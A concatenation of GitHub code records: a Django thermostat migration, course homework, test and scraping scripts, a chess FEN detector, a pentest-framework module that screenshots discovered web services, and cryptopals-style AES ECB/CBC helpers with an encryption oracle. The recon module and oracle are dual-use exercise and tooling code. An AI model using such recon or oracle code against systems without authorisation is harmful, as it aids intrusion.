],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SavingProposal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('type', models.CharField(default=b'CAMP', max_length=4, choices=[(b'SCHE', b'Programmation'), (b'CAMP', b'Campagne')])),\n ('status', models.CharField(default=b'PROP', max_length=4, choices=[(b'PROP', b'Propos\\xc3\\xa9e'), (b'APPL', b'Appliqu\\xc3\\xa9e'), (b'DISM', b'Annul\\xc3\\xa9e'), (b'EXPI', b'Expir\\xc3\\xa9e')])),\n ('startValidityPeriod', models.DateTimeField()),\n ('endValidityPeriod', models.DateTimeField()),\n ('title', models.CharField(max_length=100)),\n ('content', models.CharField(max_length=1000)),\n ('amount', models.FloatField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SetPointHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('createdOn', models.DateTimeField(auto_now_add=True)),\n ('temperature', models.FloatField()),\n ('modeName', models.CharField(max_length=100)),\n ('modeInternalCode', models.CharField(max_length=4)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SpecialSchedule',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('startDate', models.DateTimeField()),\n ('endDate', models.DateTimeField()),\n ('priority', models.IntegerField()),\n ('removed', models.BooleanField(default=False)),\n ('savingProposal', models.ForeignKey(default=None, blank=True, to='thermostats.SavingProposal', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TemperatureMode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('internal_code', models.CharField(default=b'CUST', max_length=4, choices=[(b'COMF', b'Confort'), (b'AWAY', b'Absent'), (b'NIGH', b'Nuit'), (b'CUST', b'Custom')])),\n ('name', models.CharField(default=b'Temp\\xc3\\xa9rature Utilisateur', max_length=100)),\n ('temperature', models.FloatField()),\n ('removable', models.BooleanField(default=True)),\n ('removed', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Thermostat',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('createdOn', models.DateTimeField(auto_now_add=True)),\n ('name', models.CharField(default=b'', max_length=100, blank=True)),\n ('timezone', models.CharField(default=b'Europe/Paris', max_length=100)),\n ('address', models.CharField(default=b'', max_length=1024, blank=True)),\n ('uid', models.CharField(default=b'', max_length=128, blank=True)),\n ('apiKey', models.CharField(default=b'', max_length=128, blank=True)),\n ('startSavingPeriod', models.DateTimeField()),\n ('totalSavingForPeriod', models.FloatField(default=0.0)),\n ('boilerOn', models.BooleanField(default=False)),\n ],\n options={\n 'ordering': ('createdOn',),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ControlParameters',\n fields=[\n ('coef', models.FloatField(default=0.1)),\n ('thermostat', models.OneToOneField(primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BuildingParameters',\n fields=[\n ('annualEnergyBill', 
models.FloatField()),\n ('annualSubscriptionAmount', models.FloatField()),\n ('boilerType', models.CharField(default=b'GAS', max_length=4, choices=[(b'GAS', b'Gaz'), (b'OIL', b'Fuel'), (b'ELEC', b'Electrique')])),\n ('dju', models.FloatField()),\n ('thermostat', models.OneToOneField(related_name='building_parameters', primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WeekSchedule',\n fields=[\n ('thermostat', models.OneToOneField(primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WeekScheduleMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('isoWeekDay', models.IntegerField()),\n ('hour', models.IntegerField()),\n ('minute', models.IntegerField()),\n ('temperatureMode', models.ForeignKey(to='thermostats.TemperatureMode')),\n ('weekSchedule', models.ForeignKey(to='thermostats.WeekSchedule')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='thermostat',\n name='owner',\n field=models.ForeignKey(related_name='thermostats', to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='temperaturemode',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='specialschedule',\n name='temperatureMode',\n field=models.ForeignKey(to='thermostats.TemperatureMode'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='specialschedule',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='setpointhistory',\n name='thermostat',\n field=models.ForeignKey(related_name='set_point_history', to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savingproposal',\n name='thermostat',\n field=models.ForeignKey(related_name='saving_proposal', to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savinghistory',\n name='specialSchedule',\n field=models.ForeignKey(related_name='saving_history', blank=True, to='thermostats.SpecialSchedule', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savinghistory',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='measuredtemp',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n ]\n","repo_name":"damienlaine/djoro-server","sub_path":"thermostats/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29310519267","text":"HW_SOURCE_FILE = __file__\n\n\ndef merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> s1 = [1, 3, 5]\n >>> s2 = [2, 4, 6]\n >>> merge(s1, s2)\n [1, 2, 3, 4, 5, 6]\n >>> s1\n [1, 3, 5]\n >>> s2\n [2, 4, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n >>> merge([2, 3, 4], [2, 4, 6])\n [2, 2, 3, 4, 4, 6]\n \"\"\"\n if lst1 == [] or lst2 == []:\n return lst1 + lst2\n else:\n if lst1[0] < lst2[0]:\n return [lst1[0]] + 
merge(lst1[1:], lst2)\n else:\n return [lst2[0]] + merge(lst1, lst2[1:])\n\n\ndef remove_odd_indices(lst, odd):\n \"\"\"Remove elements of lst that have odd indices. Use recursion!\n\n >>> s = [1, 2, 3, 4]\n >>> t = remove_odd_indices(s, True)\n >>> s\n [1, 2, 3, 4]\n >>> t\n [1, 3]\n >>> l = [5, 6, 7, 8]\n >>> m = remove_odd_indices(l, False)\n >>> m\n [6, 8]\n >>> remove_odd_indices([9, 8, 7, 6, 5, 4, 3], False)\n [8, 6, 4]\n >>> remove_odd_indices([2], False)\n []\n >>> # Do not use while/for loops!\n >>> from construct_check import check\n >>> # ban iteration\n >>> check(HW_SOURCE_FILE, 'remove_odd_indices',\n ... ['While', 'For'])\n True\n \"\"\"\n if len(lst) <= 2:\n if odd:\n return [lst[0]]\n else:\n if len(lst) < 2:\n return []\n else:\n return [lst[1]]\n else:\n if odd:\n return [lst[0]] + remove_odd_indices(lst[2:], odd)\n return [lst[1]] + remove_odd_indices(lst[2:], odd)\n\n\nclass SmartFridge:\n \"\"\"\"\n >>> fridgey = SmartFridge()\n >>> fridgey.add_item('Mayo', 1)\n 'I now have 1 Mayo'\n >>> fridgey.add_item('Mayo', 2)\n 'I now have 3 Mayo'\n >>> fridgey.use_item('Mayo', 2.5)\n 'I have 0.5 Mayo left'\n >>> fridgey.use_item('Mayo', 0.5)\n 'Oh no, we need more Mayo!'\n >>> fridgey.add_item('Eggs', 12)\n 'I now have 12 Eggs'\n >>> fridgey.use_item('Eggs', 15)\n 'Oh no, we need more Eggs!'\n >>> fridgey.add_item('Eggs', 1)\n 'I now have 1 Eggs'\n \"\"\"\n\n def __init__(self):\n self.items = {}\n\n def add_item(self, item, quantity):\n if not item in self.items:\n self.items[item] = quantity\n else:\n self.items[item] += quantity\n return f'I now have {self.items[item]} {item}'\n\n def use_item(self, item, quantity):\n if quantity >= self.items[item]:\n self.items[item] = 0\n return f'Oh no, we need more {item}!'\n else:\n self.items[item] -= quantity\n return f'I have {self.items[item]} {item} left'\n\n\nclass VendingMachine:\n \"\"\"A vending machine that vends some product for some price.\n\n >>> v = VendingMachine('candy', 10)\n >>> v.vend()\n 'Nothing left to vend. Please restock.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n >>> v.restock(2)\n 'Current candy stock: 2'\n >>> v.vend()\n 'Please update your balance with $10 more funds.'\n >>> v.add_funds(7)\n 'Current balance: $7'\n >>> v.vend()\n 'Please update your balance with $3 more funds.'\n >>> v.add_funds(5)\n 'Current balance: $12'\n >>> v.vend()\n 'Here is your candy and $2 change.'\n >>> v.add_funds(10)\n 'Current balance: $10'\n >>> v.vend()\n 'Here is your candy.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n\n >>> w = VendingMachine('soda', 2)\n >>> w.restock(3)\n 'Current soda stock: 3'\n >>> w.restock(3)\n 'Current soda stock: 6'\n >>> w.add_funds(2)\n 'Current balance: $2'\n >>> w.vend()\n 'Here is your soda.'\n \"\"\"\n\n def __init__(self, name, price):\n self.name = name\n self.price = price\n self.stock = 0\n self.funds = 0\n\n def vend(self):\n if self.stock == 0:\n return 'Nothing left to vend. Please restock.'\n elif self.funds < self.price:\n res = self.price - self.funds\n return f'Please update your balance with ${res} more funds.'\n elif self.funds >= self.price:\n self.stock -= 1\n res = self.funds - self.price\n self.funds = 0\n if res == 0:\n return f'Here is your {self.name}.'\n return f'Here is your {self.name} and ${res} change.'\n\n def add_funds(self, funds):\n if self.stock == 0:\n return f'Nothing left to vend. Please restock. 
Here is your ${funds}.'\n        else:\n            self.funds += funds\n            return f'Current balance: ${self.funds}'\n\n    def restock(self, stock):\n        self.stock += stock\n        return f'Current {self.name} stock: {self.stock}'\n","repo_name":"Fontzs/CS61A","sub_path":"hw/hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"21052445149","text":"from behave import given, then\nimport requests\nfrom pathlib import Path\n\n@given('the API is running')\ndef step_impl(context):\n    # Make a GET request to the /health endpoint to check that the API is running\n    response = requests.get(\"http://localhost:8000\")\n    assert response.status_code == 200\n\n@then('the response status code should be \"{code}\"')\ndef step_impl(context, code):\n    assert context.response.status_code == int(code) ","repo_name":"slavaklevleev/uiprpo_lab8_2","sub_path":"features/steps/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"42967146232","text":"import csv\n# import sele\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom selenium.webdriver.chrome.options import Options\n\n# # adjust this to match your browser driver\n# option = webdriver.ChromeOptions()\n# # enable this block when you don't want to show the browser\n# option.add_argument('headless')\n# driver = webdriver.Chrome(\n#     './chromedriver_win32/chromedriver.exe', options=option)\n\n# uncomment when you want to show the browser\ndriver = webdriver.Chrome('./chromedriver_win32/chromedriver.exe')\n# input the URL here\ndriver.get(\"http://13.250.157.96/\")\n\n# test loading time and speed time....\nnavigationStart = driver.execute_script(\n    \"return window.performance.timing.navigationStart\")\ndomContentLoadedEventEnd = driver.execute_script(\n    \"return window.performance.timing.domContentLoadedEventEnd\")\nloadEventEnd = driver.execute_script(\n    \"return window.performance.timing.loadEventEnd\")\n\nbackendPerformance = (domContentLoadedEventEnd - navigationStart)/1000\nfrontendPerformance = (loadEventEnd - navigationStart)/1000\n\n# csv output\n\n# open the file / initialize it\nf = open('./csv_output/test.csv', 'w')\n\nheader = ['page', 'duration load', 'page load', 'status']\ndata = [driver.title, backendPerformance, frontendPerformance, 'success']\n\n# create the CSV\nwriter = csv.writer(f)\n\n# header\nwriter.writerow(header)\n# write data\nwriter.writerow(data)\n\n# generate the data\nprint(writer)\nf.close()\n\nprint(backendPerformance, \"load script data\", driver.title)\nprint(frontendPerformance, \"load performance page\", driver.title)\nprint()\ndriver.close()\n","repo_name":"taqwaDev/selenium-python-boilerplate","sub_path":"sele.py","file_name":"sele.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"28766302759","text":"'''\r\nCreated on Nov 10, 2018\r\n\r\n@author: Winterberger\r\n'''\r\n##from math import \r\ndef average(*args):\r\n    num = sum(args)\r\n    print(num)\r\n    den = len(args)\r\n    print(den)\r\n    average = float(num/den)\r\n    return average\r\n\r\n\r\n# collect values until a negative number is entered\r\nArgument = []\r\nvalue = float(input(\"Input next value to take average of: \"))\r\nwhile value >= 0:\r\n    Argument.append(value)\r\n    value = float(input(\"Input next value to take average of: \"))\r\n\r\nprint(average(*Argument))","repo_name":"ee1tbg/elanFirstPyProj","sub_path":"src/Average.py","file_name":"Average.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"41928531859","text":"\n\ndef max_sum_non_adj(lst):\n    \"\"\"\n    Time: O(n)\n    Space: O(1)\n    \"\"\"\n    res = lst[-1]\n    i = len(lst)-2\n    b, c, d = True, True, True\n\n    while i >= 0:\n        a = False\n        if not b:\n            res += lst[i]\n            a = True\n        elif lst[i] > lst[i+1]:\n            res += lst[i] - lst[i+1]\n            a, b = True, False\n        if b == c == d == False:\n            res += lst[i+2]\n            c = True\n        b, c, d = a, b, c\n        i -= 1\n\n    return res\n\n\nsolution = max_sum_non_adj\n\ntest_cases = [\n    # input, output\n    ([5, 2, 1, 1, 5], 11),\n    ([2, 4, 6, 2, 5], 13),\n]\n\nfor inp, out in test_cases:\n    print(\"input:  \", inp)\n    print(\"expected:\", out)\n    print(\"got:     \", solution(inp))\n    print()\n","repo_name":"bbriano/daily-coding-problem","sub_path":"2021-02-27:max_sum_non_adj.py","file_name":"2021-02-27:max_sum_non_adj.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"17601680867","text":"from hyperopt import hp, fmin, tpe, Trials, STATUS_OK\nfrom hyperopt.pyll.stochastic import sample\n\nspace = hp.choice('classifier_type', [\n    {\n        'type': 'naive_bayes',\n    },\n    {\n        'type': 'svm',\n        'C': hp.lognormal('svm_C', 0, 1),\n        'kernel': hp.choice('svm_kernel', [\n            {'ktype': 'linear'},\n            {'ktype': 'RBF', 'width': hp.lognormal('svm_rbf_width', 0, 1)},\n        ]),\n    },\n    {\n        'type': 'dtree',\n        'criterion': hp.choice('dtree_criterion', ['gini', 'entropy']),\n        'max_depth': hp.choice('dtree_max_depth',\n            [None, hp.qlognormal('dtree_max_depth_int', 3, 1, 1)]),\n        'min_samples_split': hp.qlognormal('dtree_min_samples_split', 2, 1, 1),\n    },\n    ])\n# hp.choice returns a search-space node, not a dict, so draw a sample before indexing\nprint(sample(space)['type'])\n","repo_name":"baochi0212/Bayesian-optimization-practice-","sub_path":"dcm.py","file_name":"dcm.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"14559793975","text":"# assume this is run after detect.py has been run, this means that the images in data/images\n# have corresponding data in labels\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport os\nimport random\nimport sklearn\nimport skimage\nimport skimage.io\nimport matplotlib.pyplot as plt\nimport detect\nimport time\nimport pathlib\nimport sys\n\nPROJECT_DIR = str(pathlib.Path(__file__).parent.absolute()) + \"/\"\nTO_CROP_LABELS_DIR = PROJECT_DIR + \"data/cropped/labels\"\nCROPPED_DIR = PROJECT_DIR + \"data/cropped\"\nOUTPUT_DIR = PROJECT_DIR + \"data/output_files\"\n\nCROP_MODEL = PROJECT_DIR + \"cropModel.pt\"\nPIECE_MODEL = PROJECT_DIR + \"pieceModel.pt\"\n\n# get command line arguments\n_, INPUT_DIR, upload_number = sys.argv\nCROPPED_DIR = CROPPED_DIR + \"/\" + upload_number\n\nif not os.path.exists(CROPPED_DIR):\n    os.mkdir(CROPPED_DIR)\n\n# rename input files to be 1->N\ndetected_files = []\nfor (dirpath, dirnames, filenames) in os.walk(INPUT_DIR):\n    for i, file in enumerate(filenames):\n        # convert not png to png; split() strips the dot, so compare bare extensions\n        try:\n            if file.split(\".\")[-1] in [\n                \"jpg\",\n                \"jpeg\",\n                \"png\",\n            ]:\n                im = Image.open(INPUT_DIR + \"/\" + file)\n                im.save(INPUT_DIR + \"/\" + file)\n                detected_files.append(file)\n            else:\n                raise FileNotFoundError\n        except Exception as e:\n            print(\"couldn't open file\")\n            print(e)\n            exit(0)\n\n\n# start off by running the crop model on the input images
\ncrop_data = detect.detect(INPUT_DIR, CROP_MODEL, CROPPED_DIR)\n\n\ndef crop_image(image, possible_chessboards, output_filename, output_dir):\n    width, height = image.size\n    # find the most confident of the chessboards here\n    # sort descending by confidence and take the first one\n    most_confident_chessboard = sorted(possible_chessboards, key=lambda row: row[5], reverse=True)[0]\n    (\n        class_id,\n        center_x,\n        center_y,\n        box_width,\n        box_height,\n        confidence,\n    ) = most_confident_chessboard\n    pixel_center_x = width * center_x\n    pixel_center_y = height * center_y\n    pixel_box_width = width * box_width\n    pixel_box_height = height * box_height\n    box_top_left_x = pixel_center_x - pixel_box_width / 2\n    box_top_left_y = pixel_center_y - pixel_box_height / 2\n\n    left = box_top_left_x\n    top = box_top_left_y\n    right = box_top_left_x + pixel_box_width\n    bottom = box_top_left_y + pixel_box_height\n    cropped_image = image.crop((left, top, right, bottom))\n    cropped_image = cropped_image.resize((1200, 1200))\n\n    # image.show()\n    cropped_image.save(output_dir + \"/\" + output_filename)\n    return list(most_confident_chessboard)\n\n\ncrops = []\nfor i in range(len(detected_files)):\n    image = Image.open(INPUT_DIR + \"/\" + detected_files[i])\n    chessboard = crop_image(image, crop_data[i], detected_files[i], CROPPED_DIR)\n    crops.append(chessboard)\n\n\n# then we run those cropped images through the piece model\ndetected_pieces = detect.detect(CROPPED_DIR, PIECE_MODEL, OUTPUT_DIR)\n\n\n# this outputs files that we can process into the final chess board!\nfen_array = [\"P\", \"N\", \"B\", \"R\", \"K\", \"Q\", \"p\", \"n\", \"b\", \"r\", \"k\", \"q\"]\n\n\ndef board_to_fen(board):\n    fen_str = \"\"\n    for y in range(8):\n        if y > 0:\n            fen_str += \"/\"\n        row = board[y]\n        counter = 0\n        row_str = \"\"\n        for x in range(8):\n            piece = row[x]\n            if piece == 12:\n                counter += 1\n            else:\n                if counter != 0:\n                    row_str += str(counter)\n                    counter = 0\n                row_str += fen_array[int(piece)]\n        if counter != 0:\n            row_str += str(counter)\n        fen_str += row_str\n\n    # who's turn is it\n    # fen_str += \" w\"\n\n    # who can castle and what was the last move\n    # fen_str += ' - -'\n    return fen_str\n\n\nfens = []\n\nfor i in range(len(detected_files)):\n    # initialize the boards all empty\n    combined_confidence = 0\n    total_number_of_pieces = 0\n    board = [[12 for x in range(8)] for y in range(8)]\n    for piece in detected_pieces[i]:\n        class_id, center_x, center_y, box_width, box_height, confidence = piece\n        if confidence < 0.85:\n            continue\n        combined_confidence += confidence\n        # split the center_x/y into the 8th it belongs in\n        x_pos = int(center_x // (0.125))\n        y_pos = int(center_y // (0.125))\n        board[y_pos][x_pos] = class_id\n        total_number_of_pieces += 1\n    fens.append(board_to_fen(board))\n\nif len(fens) == 1:\n    with open(OUTPUT_DIR + \"/\" + upload_number + \".txt\", \"w+\") as f:\n        f.write(\"0\\n\")\n        f.write(\" \".join([str(x) for x in crops[0]]) + \"\\n\")\n        f.write(fens[0] + \"\\n\")\n    exit(0)\nelse:\n    with open(OUTPUT_DIR + \"/\" + upload_number + \".txt\", \"w+\") as f:\n        f.write(\"1\\n\")\n        exit(0)\n","repo_name":"AndrewLaird/ChessTutorModels","sub_path":"get_fen_from_image.py","file_name":"get_fen_from_image.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"31148181930","text":"from lib.core.module import BaseModule\nfrom urlparse import urlparse\nimport os\n\n\nclass Module(BaseModule):\n\n    meta = {\n        'name': 'Website Screenshots',\n        'author': 'Sion 
Dafydd',\n 'description': 'Take screenshots of hosted websites using the PhantomJS tool.',\n 'query': \"SELECT ports.service || '://' || ports.ip_address || ':' || ports.port || '|' || COALESCE(hosts.host, '') FROM ports JOIN hosts ON ports.ip_address=hosts.ip_address WHERE ports.service LIKE 'http%' AND ports.ip_address NOT NULL ORDER BY ports.ip_address\",\n 'options': (\n ('path', os.path.join(BaseModule.workspace, 'webshot'), True, 'path for output'),\n ),\n }\n\n def module_run(self, targets):\n # Check if WhatWeb is installed\n bin_path = self.whereis('phantomjs')\n if bin_path is None:\n self.error(\"PhantomJS is not installed or could not be found in system path\")\n return\n\n for target in targets:\n line = target.rsplit('|')\n\n url = line[0]\n u_parse = urlparse(url, allow_fragments=False)\n # Append a slash to the the url if there is no defined path\n if u_parse.path == '':\n url += '/'\n u_parse = urlparse(url, allow_fragments=False)\n\n if line[1] and line[1] != '':\n vhost = line[1]\n else:\n vhost = u_parse.hostname\n\n path = self.options['path']\n filename = self.generate_uniq_filename(\n prefix=\"%s-[%s]-\" % (url.replace(\"//\", \"_\").replace(\":\", \"_\").replace(\"/\", \"_\"), vhost), suffix='png')\n file_path = os.path.join(path, filename)\n\n # Create the directory structure required to store the log output\n if not os.path.exists(path):\n os.makedirs(path)\n\n proxy = ''\n if self._global_options['proxy']:\n proxy = \"--proxy=%s\" % self._global_options['proxy']\n\n # Compile command string and execute\n command = \"%s --ignore-ssl-errors=yes --ssl-protocol=ANY %s \\\"%s\\\" %s %s \\\"%s\\\" 1024px*768px\" % (\n bin_path, proxy, os.path.join(self.data_path, 'webshot.js'), url, vhost, file_path)\n output = self.shell(command, suppress_stdout=True)\n if output == '':\n self.output(\"Screenshot of %s [Host:%s] saved.\" % (url, vhost))\n else:\n self.error(\"Screenshot of %s [Host:%s] failed, %s\" % (url, vhost, output.rstrip()))\n","repo_name":"sidaf/workbench","sub_path":"modules/discovery/ports-output/webshot.py","file_name":"webshot.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10041449319","text":"from openpyxl import load_workbook\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport json\n#import re\n\nwb = load_workbook(filename = '/Users/PJ/Downloads/eu_stations.xlsx')\nsheet_id1 = wb['08f9v-b1ow0']\n#sheet_id2 = wb['liens']\n\nrow = 0\n\nfor n1 in range(4454,5717):\n cell_code= \"A\" + str(n1)\n cell_no= \"B\" + str(n1)\n\n code = sheet_id1[cell_code].value\n #print(code)\n\n #https://airindex.eea.europa.eu/Map/AQI/Viewer/instant?dt=2020-08-26T10%3A00%3A00.000Z&st=DEBY004\n url_ok = \"https://airindex.eea.europa.eu/Map/AQI/Viewer/instant?dt=2020-08-26T10%3A00%3A00.000Z&st=\"+str(code)\n print(url_ok)\n print(n1)\n response= requests.get(url_ok) \n time.sleep(3)\n jsonparsed = (json.loads(response.text))\n for n2 in range(0,len(jsonparsed)):\n try:\n if jsonparsed[n2][\"PollutantId\"] == 423:\n if jsonparsed[n2][\"BandId\"] != 0:\n sheet_id1[cell_no] = 1\n \n wb.save('/Users/PJ/Downloads/eu_stations.xlsx')\n except:\n sheet_id1[cell_no] = \"timeout\"\n #for n1 in range(0,len(jsonparsed)):\n \n \n #source_code = response.text\n #print(source_code)\n \n # result = re.fullmatch('[ ]*jsonFlickrApi[ ]*\\((.+?)\\)[ ]*', source_code)\n\n # photos = jsonparsed[\"photos\"][\"photo\"]\n\n # for n2 in range(0,len(photos)):\n 
#print(photos[n2])\n","repo_name":"pjgueno/no2","sub_path":"doc/no2.py","file_name":"no2.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8796049261","text":"from __future__ import division\nimport math\nimport random\nfrom Crypto.Cipher import AES\n\n# helpers\n\ndef xor(arr1, arr2):\n \"\"\"XOR two byte arrays. Shorter array should be passed second.\"\"\"\n if len(arr2) < len(arr1):\n l1, l2 = len(arr1), len(arr2)\n arr2 = arr2 * int(l1 / l2) + arr2[:l1 % l2]\n return bytearray(c1 ^ c2 for c1, c2 in zip(arr1, arr2))\n\ndef gen_rand_key(size=16):\n \"\"\"Generate random key (default 16 bytes).\"\"\"\n return bytearray([random.SystemRandom().randint(0, 255)\n for _ in xrange(size)])\n\n# padding\n\ndef pad_pkcs7(key, block_len=16):\n \"\"\"Pad given key using PKCS#7.\n Args\n key: byte array of key to pad\n block_len: length of block to which to pad key\n Returns\n bytearray of padded key\n \"\"\"\n if block_len == len(key):\n pad_len = block_len\n else:\n pad_len = block_len - len(key)\n return key + bytearray([pad_len] * pad_len)\n\ndef strip_pkcs7(input, raise_error=True):\n \"\"\"Strip PKCS7 padding from input. Raise error if invalid padding.\n Call with raise_error=False for testing with assertions.\n \"\"\"\n padding = input[-1]\n valid = True\n for i in xrange(1, padding + 1):\n if i > len(input):\n if raise_error:\n raise IndexError('Padding too long for input')\n valid = False\n break\n if input[-i] != padding:\n if raise_error:\n raise ValueError('Invalid padding detected')\n valid = False\n\n return input[:-padding] if valid else False\n\ndef gen_blocks(code, pad=pad_pkcs7, size=16):\n \"\"\"Generate blocks from given bytearray code and pad function.\"\"\"\n num_blocks = int(math.ceil(len(code) / size))\n blocks = [code[i * size: i * size + size] for i in xrange(num_blocks)]\n\n # PKCS#7 adds extra block if last code block matches block size\n if pad == pad_pkcs7:\n padded = pad(blocks[-1], size)\n last = ([padded] if size != len(blocks[-1]) else\n [padded[:size], padded[size:]])\n # no padding specified\n else:\n last = [blocks[-1]]\n\n return blocks[:-1] + last\n\n# ECB\n\ndef apply_ECB(mode, input, key, pad=pad_pkcs7):\n \"\"\"Apply ECB to given key and inputs.\n Args\n mode: str, 'encrypt' or 'decrypt'\n input: bytearray of input code\n key: AES key object in ECB mode\n pad: padding function to use on input\n Returns\n Bytearray of encrypted or decrypted input.\n \"\"\"\n blocks = gen_blocks(input, pad if mode == 'encrypt' else None)\n aes_f = key.encrypt if mode == 'encrypt' else key.decrypt\n input_str = ''.join([str(block) for block in blocks])\n return bytearray(aes_f(input_str))\n\n# CBC\n\ndef CBC_encrypt(aes_f, blocks):\n \"\"\"CBC encrypt: first XOR then encrypt.\"\"\"\n prev = blocks[0]\n output = bytearray()\n for block in blocks[1:]:\n xor_arr = xor(prev, block)\n enc_arr = bytearray(aes_f(str(xor_arr)))\n prev = enc_arr\n output.extend(enc_arr)\n return output\n\ndef CBC_decrypt(aes_f, blocks):\n \"\"\"CBC decyrpt: first decrypt then XOR.\"\"\"\n prev = blocks[0]\n output = bytearray()\n for block in blocks[1:]:\n dec_arr = bytearray(aes_f(str(block)))\n xor_arr = xor(dec_arr, prev)\n prev = block[:]\n output.extend(xor_arr)\n return strip_pkcs7(output)\n\ndef apply_CBC(mode, input, key, iv=None, block_len=16):\n \"\"\"Apply CBC to given input, key, and iv values.\n Args\n mode: str, 'encrypt' or 'decrypt'\n input: bytearray of intput code\n key: str, key to 
use as AES key\n iv: bytearray, initialization vector for CBC\n block_len: int, optional, normally 16 for block size\n Returns\n Bytearray of encrypted or decrypted input.\n \"\"\"\n key_AES = AES.new(str(key), AES.MODE_ECB)\n iv_AES = bytearray([0] * block_len) if not iv else iv\n\n pad = pad_pkcs7 if mode == 'encrypt' else None\n blocks = [iv_AES] + gen_blocks(input, pad, len(key))\n \n return (CBC_encrypt(key_AES.encrypt, blocks) if mode == 'encrypt' else\n CBC_decrypt(key_AES.decrypt, blocks))\n\n# ECB / CBC Encryption and Detection Oracle\n\ndef encrypt_ECB_CBC(text, noise=True, force_ECB=False, noise_vals=None,\n fixed_key=None):\n \"\"\"Encrypt given text in ECB or CBC, randomly with noise unless specified.\n Args\n text: bytearray of plaintext to encrypt\n noise: bool, add 5 - 10 random bytes before and after text, default True\n force_ECB: bool, force ECB if set to True, default False\n noise_vals: tuple, optional bytearray values to (prepend, append)\n fixed_key: bytearray, optional fixed key to use in encryption\n Returns\n Bytearray of encrypted text.\n \"\"\"\n if noise and not noise_vals:\n size1 = random.SystemRandom().randint(5, 10)\n size2 = random.SystemRandom().randint(5, 10)\n text = gen_rand_key(size1) + text + gen_rand_key(size2)\n elif noise and noise_vals:\n pre, app = noise_vals\n text = pre + text + app\n\n # encrypt with ECB or CBC, optionally forcing ECB and fixed key\n key = gen_rand_key() if not fixed_key else fixed_key\n ECB = random.SystemRandom().randint(0, 1)\n\n if ECB or force_ECB:\n code = apply_ECB('encrypt', text, AES.new(str(key), AES.MODE_ECB))\n else:\n code = apply_CBC('encrypt', text, key, gen_rand_key())\n return code\n\ndef 